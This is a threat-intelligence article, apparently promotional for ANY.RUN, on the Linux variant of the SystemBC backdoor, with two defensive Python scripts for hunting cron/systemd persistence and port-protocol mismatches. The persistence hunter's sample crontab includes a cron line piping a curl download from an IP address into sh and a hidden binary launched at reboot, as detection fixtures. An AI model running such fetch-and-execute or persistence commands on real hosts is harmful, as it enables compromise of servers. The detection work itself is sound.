Threat analysts are raising the alarm: a Linux version of SystemBC, a well-known proxy malware and backdoor, is targeting Linux-based enterprise servers and cloud infrastructure.
SystemBC, a malware often used as a backdoor in cyberattacks, was first spotted in 2018. It gives attackers remote control over the infected host and delivers additional payloads, including trojans and ransomware.
It emerged as Windows-only malware; the recent Linux variant makes it cross-platform and considerably more dangerous, since Linux servers form the backbone of many enterprise environments. Security teams should take this threat seriously.
SystemBC for Linux: a closer look into the features
ANY.RUN’s analysts matched the traffic of SystemBC’s Windows and Linux versions
This fairly sophisticated piece of malware acts as a SOCKS5 proxy or a backdoor, giving attackers persistent access to compromised systems. It is frequently used in ransomware campaigns, notably those involving Egregor or Ryuk, to facilitate command-and-control (C2) communications.
- SystemBC is typically delivered through phishing emails, exploit kits, or exploitation of vulnerabilities in Linux servers. It can also arrive as a secondary payload dropped by other malware.
- The Linux version is executed as a binary disguised as a legitimate system process or service. Attackers may use shell scripts or cron jobs to automate its execution.
- Cron jobs are created to run the malware at set intervals or after a reboot. SystemBC can also register itself as a systemd service so that it loads automatically at boot.
- SystemBC acts as a SOCKS5 proxy with encrypted communications to mask its traffic and evade network monitoring tools. It blends in with legitimate traffic by using common ports (e.g., 80, 443).
- The Linux variant is lightweight and leaves minimal traces on the filesystem, which reduces the chances of detection by endpoint protection tools.
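To hunt for the cron and systemd persistence just described, here is an added example (not ANY.RUN's or SystemBC's code) that parses crontab and systemd unit text and flags launch commands a legitimate service rarely uses: binaries started from scratch or user directories, hidden path components, downloads piped to a shell, and silenced background jobs. The heuristics are assumptions about normal daemon behaviour and the crontab and unit text are constructed samples; on a live host you would feed it /etc/crontab, /etc/cron.d/*, each user's crontab -l output and the unit files under /etc/systemd/system.

```python
"""Hunt for cron/systemd persistence of the kind described above.
Added example, not ANY.RUN or SystemBC code; heuristics are assumptions
and the sample crontab/unit text is constructed."""
import re
from dataclasses import dataclass, field
from typing import List

# Directories from which legitimate system services are almost never started.
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/run/user/", "/home/", "/root/")
CRON_ENV_LINE = re.compile(r"^\w+=")                          # e.g. PATH=/usr/bin:/bin
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")  # fetch-and-execute
SILENCED_BG = re.compile(r">\s*/dev/null\s+2>&1\s*&\s*$")      # output dropped, backgrounded


@dataclass
class Finding:
    source: str                     # "cron" or "systemd"
    origin: str                     # crontab path or unit name
    command: str
    reasons: List[str] = field(default_factory=list)


def _executable(command: str) -> str:
    """First token of the command, skipping leading VAR=value assignments."""
    for tok in command.split():
        if "=" in tok and not tok.startswith("/"):
            continue
        return tok
    return ""


def assess_command(command: str) -> List[str]:
    """Return the reasons a launch command looks like implant persistence."""
    reasons, exe = [], _executable(command)
    if exe.startswith(SCRATCH_DIRS):
        reasons.append("executable in scratch/user directory")
    if "/." in exe:
        reasons.append("hidden path component")
    if PIPE_TO_SHELL.search(command):
        reasons.append("download piped to shell")
    if SILENCED_BG.search(command):
        reasons.append("backgrounded and silenced")
    return reasons


def scan_crontab(text: str, origin: str, system_crontab: bool = True) -> List[Finding]:
    """Parse crontab lines (the system format carries a user field) and flag commands."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or CRON_ENV_LINE.match(line):
            continue
        # "@reboot"-style schedules are one token, classic schedules are five.
        fields = (1 if line.startswith("@") else 5) + (1 if system_crontab else 0)
        parts = line.split(None, fields)
        if len(parts) <= fields:
            continue
        reasons = assess_command(parts[fields])
        if reasons:
            findings.append(Finding("cron", origin, parts[fields], reasons))
    return findings


def scan_unit(text: str, origin: str) -> List[Finding]:
    """Flag ExecStart= lines in a systemd unit's [Service] section."""
    section, exec_starts, restart = "", [], ""
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
        elif section == "Service" and "=" in line:
            key, value = line.split("=", 1)
            if key == "ExecStart":
                exec_starts.append(value.lstrip("-@+!:").strip())  # strip systemd exec prefixes
            elif key == "Restart":
                restart = value.strip()
    findings = []
    for command in exec_starts:
        reasons = assess_command(command)
        if reasons and restart in ("always", "on-failure"):
            reasons.append("auto-restart keeps it resident")
        if reasons:
            findings.append(Finding("systemd", origin, command, reasons))
    return findings


# Constructed samples: one benign system cron line, two persistence-style
# entries, and a unit that starts a hidden binary from /dev/shm.
SAMPLE_CRONTAB = """\
# /etc/crontab (constructed sample)
PATH=/usr/bin:/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
@reboot         root    /var/tmp/.cache/sysd >/dev/null 2>&1 &
*/10 * * * *    root    curl -s http://203.0.113.10/x | sh
"""
SAMPLE_UNIT = """\
[Unit]
Description=System Daemon
After=network.target

[Service]
ExecStart=-/dev/shm/.systemd-helper --daemon
Restart=always

[Install]
WantedBy=multi-user.target
"""

if __name__ == "__main__":
    for f in scan_crontab(SAMPLE_CRONTAB, "/etc/crontab") + scan_unit(SAMPLE_UNIT, "sysd.service"):
        print(f"[{f.source}] {f.origin}: {f.command!r} -> {', '.join(f.reasons)}")
```

Only the executable path is checked against the scratch directories, so a wrapper such as /bin/sh -c '/tmp/x' slips through this version; extend assess_command to look inside -c arguments if that pattern shows up in your environment. Treat every finding as a lead to be confirmed against the binary's hash and its network behaviour, not as a verdict.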
Collect the Latest Threat Intel on SystemBC’s Linux Variant
Once SystemBC is in your network, you are in trouble. It is not the end of the world: an attack can be contained and countered, its consequences mitigated and systems restored. But proactive prevention is far preferable, and threat intelligence is one of the first defensive tools to reach for. Explore the malware's indicators, behaviors, tactics and techniques to fine-tune your defenses.
SystemBC knows how to avoid detection and resist sandboxes: it encrypts its traffic and recognizes virtual machines. ANY.RUN's toolset, however, is built to deal with malware of this kind.
1. Use Threat Intelligence Lookup to turn SystemBC's IOCs into starting points for further research: submit associated domains, file hashes, mutexes, registry keys and other indicators as search queries.
os:"22.04.2" and threatName:"systembc"
Linux-tailored malware campaign samples
The “Tasks” tab in the search results lists further sandbox sessions in which security researchers recently analyzed the Linux variant of SystemBC. Click any task to view the detonation in the sandbox and gather more TTPs.
50 free search requests are at your disposal to try TI Lookup before adding it to your SOC toolbox.
2. Use the Interactive Sandbox to let SystemBC loose in a controlled environment, watch it interact with the endpoint, and collect IOCs for further analysis.
SystemBC sample detonated inside the sandbox
It comes to stay, brings friends along: why SystemBC is dangerous
Why are SystemBC in general, and its Linux variant in particular, worth attention?
- Persistent and Stealthy: the malware is alarmingly good at maintaining long-term access to compromised systems without being detected.
- Vehicle for Ransomware: SystemBC often delivers payloads that facilitate ransomware attacks.
- Targets Critical Infrastructure: Linux servers are often used in corporate and enterprise networks and cloud environments. Compromising them can lead to widespread disruption, data theft, or financial losses.
Conclusion
The Linux variant of the SystemBC proxy implant is likely designed to reach internal corporate services, and it is used against corporate networks, cloud servers, and even IoT devices.
It gives attackers freedom to move laterally across a network and pivot without deploying additional, more detectable tools.
It is vital for SOC teams to detect such malicious communication quickly, using in-depth network traffic insights from tools like ANY.RUN's Threat Intelligence Lookup.
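The feature list above notes that SystemBC hides among legitimate traffic on common ports such as 80 and 443. That suggests a cheap network check to complement threat-intel lookups: does the first thing a client sends on 443 actually parse as a TLS ClientHello, and on 80 as an HTTP request line? The following added example (not ANY.RUN or SystemBC code) implements that check; it assumes you can extract each flow's first client bytes from a pcap or flow export, and the flows it runs over are constructed samples.

```python
"""Flag flows to 80/443 whose first client bytes are not the protocol the
port implies. Added example, not ANY.RUN or SystemBC code; the sample
flows are constructed."""
import re

HTTP_REQUEST_LINE = re.compile(
    rb"^(GET|POST|HEAD|PUT|DELETE|OPTIONS|PATCH|CONNECT) \S+ HTTP/1\.[01]\r\n")

# Ports where we know what a legitimate client's first bytes look like.
EXPECTED = {443: "tls", 80: "http"}


def looks_like_tls_client_hello(data: bytes) -> bool:
    """Validate the TLS record header and handshake header of a ClientHello
    (RFC 8446 sections 5.1 and 4)."""
    if len(data) < 11:
        return False
    if data[0] != 0x16 or data[1] != 0x03 or data[2] not in (0x01, 0x02, 0x03):
        return False                                  # not a handshake record
    record_len = int.from_bytes(data[3:5], "big")
    if data[5] != 0x01:                               # handshake type must be ClientHello
        return False
    handshake_len = int.from_bytes(data[6:9], "big")
    if handshake_len + 4 != record_len:               # a ClientHello fills exactly one record
        return False
    return data[9] == 0x03 and data[10] in (0x01, 0x02, 0x03)  # legacy_version


def looks_like_http_request(data: bytes) -> bool:
    return HTTP_REQUEST_LINE.match(data) is not None


def classify_flow(dst_port: int, first_bytes: bytes) -> str:
    """'expected-protocol', 'protocol-mismatch', or 'no-baseline' for other ports."""
    expected = EXPECTED.get(dst_port)
    if expected is None:
        return "no-baseline"
    check = looks_like_tls_client_hello if expected == "tls" else looks_like_http_request
    return "expected-protocol" if check(first_bytes) else "protocol-mismatch"


def fake_client_hello() -> bytes:
    """Build a minimal, structurally valid TLS 1.2-style ClientHello (constructed)."""
    body = (b"\x03\x03" + bytes(32)       # legacy_version, random
            + b"\x00"                    # empty session id
            + b"\x00\x02\x13\x01"        # one cipher suite
            + b"\x01\x00"                # null compression only
            + b"\x00\x00")               # no extensions
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body
    return b"\x16\x03\x01" + len(handshake).to_bytes(2, "big") + handshake


# Constructed flows: (src, dst_port, first bytes the client sent).
SAMPLE_FLOWS = [
    ("10.0.0.5", 443, fake_client_hello()),
    ("10.0.0.7", 443, bytes.fromhex("a1f03c9e7b2d44e80193cc7e52f1")),  # encrypted blob, no TLS framing
    ("10.0.0.9", 80, b"GET /index.html HTTP/1.1\r\nHost: intranet\r\n\r\n"),
    ("10.0.0.11", 80, b"\x05\x01\x00"),                                  # cleartext SOCKS5 greeting on 80
    ("10.0.0.13", 8443, b"\x05\x01\x00"),                                # no baseline for this port
]


def suspicious_flows(flows):
    """Return (src, dst_port) for flows whose payload does not match the port."""
    return [(src, port) for src, port, data in flows
            if classify_flow(port, data) == "protocol-mismatch"]


if __name__ == "__main__":
    for src, port in suspicious_flows(SAMPLE_FLOWS):
        print(f"{src} -> :{port} protocol mismatch, inspect this host")
```

The caveat: this only catches a C2 channel that puts a non-TLS encryption scheme on port 443, or raw bytes on port 80. An implant that wraps its traffic in genuine TLS passes the framing check, so pair this with certificate, SNI and JA3/JA4 fingerprint checks and with the indicators gathered from TI Lookup and the sandbox.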